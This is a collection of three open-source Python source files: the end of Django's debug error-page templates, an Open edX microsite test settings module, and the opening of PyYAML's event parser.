{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}"""
"""<span class="specific">{{ template_info.during }}</span>"""
"""{{ template_info.after }}</td>
</tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">
Switch to copy-and-paste view</a></span>{% endif %}
</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
<li><h3>
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
</h3></li>
{% endif %}{% endifchanged %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">
{% for line in frame.pre_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line">
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>
""" """{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">
{% for line in frame.post_context %}
<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>
{% endfor %}
</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}"""
"{% for source_line in template_info.source_lines %}"
"{% ifequal source_line.0 template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endifequal %}{% endfor %}{% endif %}
Traceback:{% for frame in frames %}
{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}{% endif %}{% endifchanged %}
File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
{% endif %}
</body>
</html>
""")
TECHNICAL_500_TEXT_TEMPLATE = ("""{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader postmortem
{% if postmortem %}Django tried loading these templates, in this order:
{% for entry in postmortem %}
Using engine {{ entry.backend.name }}:
{% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
{% endfor %}{% else %} This engine did not provide a list of tried templates.
{% endif %}{% endfor %}
{% else %}No templates were found because your 'TEMPLATES' setting is not configured.
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}
{% for source_line in template_info.source_lines %}"""
"{% ifequal source_line.0 template_info.line %}"
" {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}"
"{% else %}"
" {{ source_line.0 }} : {{ source_line.1 }}"
"""{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:"""
"{% for frame in frames %}"
"{% ifchanged frame.exc_cause %}"
" {% if frame.exc_cause %}" """
{% if frame.exc_cause_explicit %}
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception:
{% else %}
During handling of the above exception ({{ frame.exc_cause }}), another exception occurred:
{% endif %}
{% endif %}
{% endifchanged %}
File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% if not is_email %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard page generated by the handler for this status code.
{% endif %}
""")
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% if raising_view_name %}
<tr>
<th>Raised by:</th>
<td>{{ raising_view_name }}</td>
</tr>
{% endif %}
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd;
}
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
| bsd-3-clause |
SivilTaram/edx-platform | lms/envs/cms/microsite_test.py | 110 | 1675 | """
This is a localdev test for the Microsite processing pipeline
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
from .dev import *
from ..dev import ENV_ROOT, FEATURES
MICROSITE_CONFIGURATION = {
"openedx": {
"domain_prefix": "openedx",
"university": "openedx",
"platform_name": "Open edX",
"logo_image_url": "openedx/images/header-logo.png",
"email_from_address": "[email protected]",
"payment_support_email": "[email protected]",
"ENABLE_MKTG_SITE": False,
"SITE_NAME": "openedx.localhost",
"course_org_filter": "CDX",
"course_about_show_social_links": False,
"css_overrides_file": "openedx/css/openedx.css",
"show_partners": False,
"show_homepage_promo_video": False,
"course_index_overlay_text": "Explore free courses from leading universities.",
"course_index_overlay_logo_file": "openedx/images/header-logo.png",
"homepage_overlay_html": "<h1>Take an Open edX Course</h1>"
}
}
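# Illustrative sketch (the accessor API is an assumption, not part of this
# settings file): platform code typically reads the values above through the
# microsite accessor once USE_MICROSITES is enabled below, e.g.
#
#     from microsite_configuration import microsite
#     microsite.get_value('platform_name', default='edX')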
MICROSITE_ROOT_DIR = ENV_ROOT / 'edx-microsite'
# Pretend we are behind some marketing site; we want to be able to assert
# that the microsite config values override this global setting.
FEATURES['ENABLE_MKTG_SITE'] = True
FEATURES['USE_MICROSITES'] = True
| agpl-3.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/yaml/parser.py | 409 | 25542 |
# The following YAML grammar is LL(1) and is parsed by a recursive descent
# parser.
#
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
# block_node_or_indentless_sequence ::=
# ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
# FIRST sets:
#
# stream: { STREAM-START }
# explicit_document: { DIRECTIVE DOCUMENT-START }
# implicit_document: FIRST(block_node)
# block_node: { ALIAS TAG ANCHOR SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START }
# flow_node: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START }
# block_content: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }
# flow_content: { FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR }
# block_collection: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START }
# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }
# block_sequence: { BLOCK-SEQUENCE-START }
# block_mapping: { BLOCK-MAPPING-START }
# block_node_or_indentless_sequence: { ALIAS ANCHOR TAG SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START BLOCK-ENTRY }
# indentless_sequence: { ENTRY }
# flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START }
# flow_sequence: { FLOW-SEQUENCE-START }
# flow_mapping: { FLOW-MAPPING-START }
# flow_sequence_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }
# flow_mapping_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY }
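#
# Illustrative usage sketch (not part of this module): the Parser below is
# normally mixed into a Loader together with Reader and Scanner; its event
# stream can be observed through the package-level helper:
#
#     import yaml
#     for event in yaml.parse("a: [1, 2]"):
#         print(event)
#
# which yields StreamStartEvent, DocumentStartEvent, MappingStartEvent,
# ScalarEvent, SequenceStartEvent, ... down to StreamEndEvent.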
__all__ = ['Parser', 'ParserError']
from error import MarkedYAMLError
from tokens import *
from events import *
from scanner import *
class ParserError(MarkedYAMLError):
pass
class Parser(object):
    # Since writing a recursive descent parser is a straightforward task, we
    # do not give many comments here.
DEFAULT_TAGS = {
u'!': u'!',
u'!!': u'tag:yaml.org,2002:',
}
def __init__(self):
self.current_event = None
self.yaml_version = None
self.tag_handles = {}
self.states = []
self.marks = []
self.state = self.parse_stream_start
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def check_event(self, *choices):
# Check the type of the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
if self.current_event is not None:
if not choices:
return True
for choice in choices:
if isinstance(self.current_event, choice):
return True
return False
def peek_event(self):
# Get the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
return self.current_event
def get_event(self):
# Get the next event and proceed further.
if self.current_event is None:
if self.state:
self.current_event = self.state()
value = self.current_event
self.current_event = None
return value
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
def parse_stream_start(self):
# Parse the stream start.
token = self.get_token()
event = StreamStartEvent(token.start_mark, token.end_mark,
encoding=token.encoding)
# Prepare the next state.
self.state = self.parse_implicit_document_start
return event
def parse_implicit_document_start(self):
# Parse an implicit document.
if not self.check_token(DirectiveToken, DocumentStartToken,
StreamEndToken):
self.tag_handles = self.DEFAULT_TAGS
token = self.peek_token()
start_mark = end_mark = token.start_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=False)
# Prepare the next state.
self.states.append(self.parse_document_end)
self.state = self.parse_block_node
return event
else:
return self.parse_document_start()
def parse_document_start(self):
# Parse any extra document end indicators.
while self.check_token(DocumentEndToken):
self.get_token()
# Parse an explicit document.
if not self.check_token(StreamEndToken):
token = self.peek_token()
start_mark = token.start_mark
version, tags = self.process_directives()
if not self.check_token(DocumentStartToken):
raise ParserError(None, None,
"expected '<document start>', but found %r"
% self.peek_token().id,
self.peek_token().start_mark)
token = self.get_token()
end_mark = token.end_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=True, version=version, tags=tags)
self.states.append(self.parse_document_end)
self.state = self.parse_document_content
else:
# Parse the end of the stream.
token = self.get_token()
event = StreamEndEvent(token.start_mark, token.end_mark)
assert not self.states
assert not self.marks
self.state = None
return event
def parse_document_end(self):
# Parse the document end.
token = self.peek_token()
start_mark = end_mark = token.start_mark
explicit = False
if self.check_token(DocumentEndToken):
token = self.get_token()
end_mark = token.end_mark
explicit = True
event = DocumentEndEvent(start_mark, end_mark,
explicit=explicit)
# Prepare the next state.
self.state = self.parse_document_start
return event
def parse_document_content(self):
if self.check_token(DirectiveToken,
DocumentStartToken, DocumentEndToken, StreamEndToken):
event = self.process_empty_scalar(self.peek_token().start_mark)
self.state = self.states.pop()
return event
else:
return self.parse_block_node()
def process_directives(self):
self.yaml_version = None
self.tag_handles = {}
while self.check_token(DirectiveToken):
token = self.get_token()
if token.name == u'YAML':
if self.yaml_version is not None:
raise ParserError(None, None,
"found duplicate YAML directive", token.start_mark)
major, minor = token.value
if major != 1:
raise ParserError(None, None,
"found incompatible YAML document (version 1.* is required)",
token.start_mark)
self.yaml_version = token.value
elif token.name == u'TAG':
handle, prefix = token.value
if handle in self.tag_handles:
raise ParserError(None, None,
"duplicate tag handle %r" % handle.encode('utf-8'),
token.start_mark)
self.tag_handles[handle] = prefix
if self.tag_handles:
value = self.yaml_version, self.tag_handles.copy()
else:
value = self.yaml_version, None
for key in self.DEFAULT_TAGS:
if key not in self.tag_handles:
self.tag_handles[key] = self.DEFAULT_TAGS[key]
return value
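    # For example (illustrative), a document starting with
    #
    #     %YAML 1.1
    #     %TAG ! tag:example.com,2014:
    #     --- !widget {name: spin}
    #
    # leaves tag_handles == {u'!': u'tag:example.com,2014:',
    # u'!!': u'tag:yaml.org,2002:'}, so parse_node() resolves the node tag
    # to u'tag:example.com,2014:widget'.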
# block_node_or_indentless_sequence ::= ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
def parse_block_node(self):
return self.parse_node(block=True)
def parse_flow_node(self):
return self.parse_node()
def parse_block_node_or_indentless_sequence(self):
return self.parse_node(block=True, indentless_sequence=True)
def parse_node(self, block=False, indentless_sequence=False):
if self.check_token(AliasToken):
token = self.get_token()
event = AliasEvent(token.value, token.start_mark, token.end_mark)
self.state = self.states.pop()
else:
anchor = None
tag = None
start_mark = end_mark = tag_mark = None
if self.check_token(AnchorToken):
token = self.get_token()
start_mark = token.start_mark
end_mark = token.end_mark
anchor = token.value
if self.check_token(TagToken):
token = self.get_token()
tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
elif self.check_token(TagToken):
token = self.get_token()
start_mark = tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
if self.check_token(AnchorToken):
token = self.get_token()
end_mark = token.end_mark
anchor = token.value
if tag is not None:
handle, suffix = tag
if handle is not None:
if handle not in self.tag_handles:
raise ParserError("while parsing a node", start_mark,
"found undefined tag handle %r" % handle.encode('utf-8'),
tag_mark)
tag = self.tag_handles[handle]+suffix
else:
tag = suffix
#if tag == u'!':
# raise ParserError("while parsing a node", start_mark,
# "found non-specific tag '!'", tag_mark,
# "Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.")
if start_mark is None:
start_mark = end_mark = self.peek_token().start_mark
event = None
implicit = (tag is None or tag == u'!')
if indentless_sequence and self.check_token(BlockEntryToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark)
self.state = self.parse_indentless_sequence_entry
else:
if self.check_token(ScalarToken):
token = self.get_token()
end_mark = token.end_mark
if (token.plain and tag is None) or tag == u'!':
implicit = (True, False)
elif tag is None:
implicit = (False, True)
else:
implicit = (False, False)
event = ScalarEvent(anchor, tag, implicit, token.value,
start_mark, end_mark, style=token.style)
self.state = self.states.pop()
elif self.check_token(FlowSequenceStartToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_sequence_first_entry
elif self.check_token(FlowMappingStartToken):
end_mark = self.peek_token().end_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_mapping_first_key
elif block and self.check_token(BlockSequenceStartToken):
end_mark = self.peek_token().start_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_sequence_first_entry
elif block and self.check_token(BlockMappingStartToken):
end_mark = self.peek_token().start_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_mapping_first_key
elif anchor is not None or tag is not None:
# Empty scalars are allowed even if a tag or an anchor is
# specified.
event = ScalarEvent(anchor, tag, (implicit, False), u'',
start_mark, end_mark)
self.state = self.states.pop()
else:
if block:
node = 'block'
else:
node = 'flow'
token = self.peek_token()
raise ParserError("while parsing a %s node" % node, start_mark,
"expected the node content, but found %r" % token.id,
token.start_mark)
return event
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
def parse_block_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_sequence_entry()
def parse_block_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken, BlockEndToken):
self.states.append(self.parse_block_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_block_sequence_entry
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block collection", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
def parse_indentless_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken,
KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_indentless_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_indentless_sequence_entry
return self.process_empty_scalar(token.end_mark)
token = self.peek_token()
event = SequenceEndEvent(token.start_mark, token.start_mark)
self.state = self.states.pop()
return event
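    # An indentless sequence (illustrative) is a block sequence used as a
    # mapping value without extra indentation:
    #
    #     key:
    #     - a
    #     - b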
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
def parse_block_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_mapping_key()
def parse_block_mapping_key(self):
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_value)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_value
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block mapping", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_block_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_key)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_block_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
    # Note that while the production rules for flow_sequence_entry and
    # flow_mapping_entry are identical, their interpretations differ.
    # For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?`
    # generates an inline mapping (set syntax).
def parse_flow_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_sequence_entry(first=True)
